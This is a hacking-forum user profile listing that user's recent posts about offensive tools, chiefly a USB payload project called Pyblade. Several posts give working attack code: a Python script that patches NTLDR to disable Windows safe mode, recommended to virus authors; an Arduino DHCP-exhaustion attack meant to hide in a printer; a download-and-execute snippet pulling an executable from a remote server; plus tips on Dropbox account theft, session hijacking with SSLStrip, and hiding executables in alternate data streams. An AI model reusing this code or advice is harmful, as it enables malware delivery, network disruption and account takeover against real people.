Jump to content

sablefoxx

Dedicated Members
  • Posts

    572
  • Joined

  • Last visited

  • Days Won

    1

About sablefoxx

  • Birthday 01/01/1911

Contact Methods

  • Website URL
    http://
  • ICQ
    0

Profile Information

  • Gender
    Male
  • Location
    /Milkyway/Terran System/Earth/
  • Interests
    Greatest Albums:<br />-----------------------------------------------------<br />The Dark Side of the Moon - Pink Floyd<br />Give Up - The Postal Service<br />The Classics - Ratatat<br />-----------------------------------------------------

Recent Profile Visitors

23,581 profile views

sablefoxx's Achievements

Newbie

Newbie (1/14)

  1. @ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.
  2. sablefoxx

    Pyblade

    Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c And if you're feeling a bit evil, disable safe mode (XP/2k3): # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
  3. Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
  4. Yeah that doesn't seem like a very mean virus. You can prbly just boot into safe mode and modify the Group Policies or regkeys to re-gain access. On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so: # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
  5. DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something. /*** * Net~nade: The hand held DHCP grenade (exhaustion attack) * Written by: Sablefoxx */ #include &lt;Ethernet.h&gt; #include &lt;EthernetDHCP.h&gt; /* Function Prototypes */ void requestIp(byte); void displayMac(byte); const char* addressToString(const uint8_t* ip); /* Setup */ void setup() { Serial.begin(9600); } /* Main Loop */ void loop() { byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01}; for(int hexFour = 0; hexFour &lt; 256; ++hexFour) { for(int hexFive = 0; hexFive &lt; 256; ++hexFive) { requestIp(mac); mac[5]++; hexFive++; EthernetDHCP.maintain(); } mac[4]++; // Incriment 4th hex value mac[5] = 0x01; // Reset 5th hex value hexFour++; // Incriment count } } void requestIp(byte mac[]) { Serial.print("[*] Attempting to obtain DHCP lease..."); EthernetDHCP.begin(mac); const byte* ip = EthernetDHCP.ipAddress(); const byte* gateway = EthernetDHCP.gatewayIpAddress(); Serial.println("got it!"); Serial.print("[+] From "); Serial.print(addressToString(gateway)); Serial.print(" got "); Serial.print(addressToString(ip)); Serial.print(" with "); displayMac(mac); Serial.print("\n"); } void displayMac(byte mac[]) { for(int index; index &lt;= 5; ++index) { Serial.print(mac[index], HEX); if(index &lt; 5) { Serial.print(":"); } } } const char* addressToString(const uint8_t* ip) { static char buf[16]; sprintf(buf, "%d.%d.%d.%d\0", ip[0], ip[1], ip[2], ip[3]); return buf; }
  6. You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python. Heres a quick example; import urllib from subprocess import Popen path = 'C:\\file.exe' # Local path url = 'http://remote-server.com/file.exe' # Remote path connection = urllib.urlopen(url) remoteFile = connection.read() connection.close() try: localFile = open(path, 'w') localFile.write(remoteFile) localFile.close() Popen(path) # Execute whatever "path" points to except IOError: print '***** OMFG ERROR: Location is not writable %s *****\n' % path Using sys.argv you can even make the 'url' a command line argument.
  7. sablefoxx

    Pyblade

    I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz
  8. http://www.instructables.com/id/Remove-U3-from-flash-drive/
  9. sablefoxx

    Firesheep

    Note: a lot of the time even when the credentials are sent over HTTPS the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective, even if you can't get the user/password you can still gain access to an account.
  10. sablefoxx

    Firesheep

    If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.
  11. sablefoxx

    Firesheep

    1. Facebook sends the cookie in clear-text even if you login via SSL. 2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip get around that Also look into using Hamster/Ferret it can attack all sites and not just a predefined list (and almost as easy to use)
  12. sablefoxx

    Pyblade

    I'm hoping not to have to use AV-Kill and instead just hide everything. Killing process is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so; E:\&gt;touch test.txt E:\&gt;echo hello world &gt;&gt; test.txt E:\&gt;cat test.txt hello world E:\&gt;dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:35 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\&gt;touch test.txt:hidden.txt E:\&gt;echo this is the hidden file &gt;&gt; test.txt:hidden.txt E:\&gt;dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:36 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\&gt;cat test.txt hello world E:\&gt;cat test.txt:hidden.txt this is the hidden file E:\&gt; Notice the file size does not change and the file isn't listed using 'dir' and cannot be viewed by enabling hidden/system file viewing. :)
  13. sablefoxx

    Pyblade

    (Sorry about the long update interval recently moved 1,784 miles to attend college) Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.
×
×
  • Create New...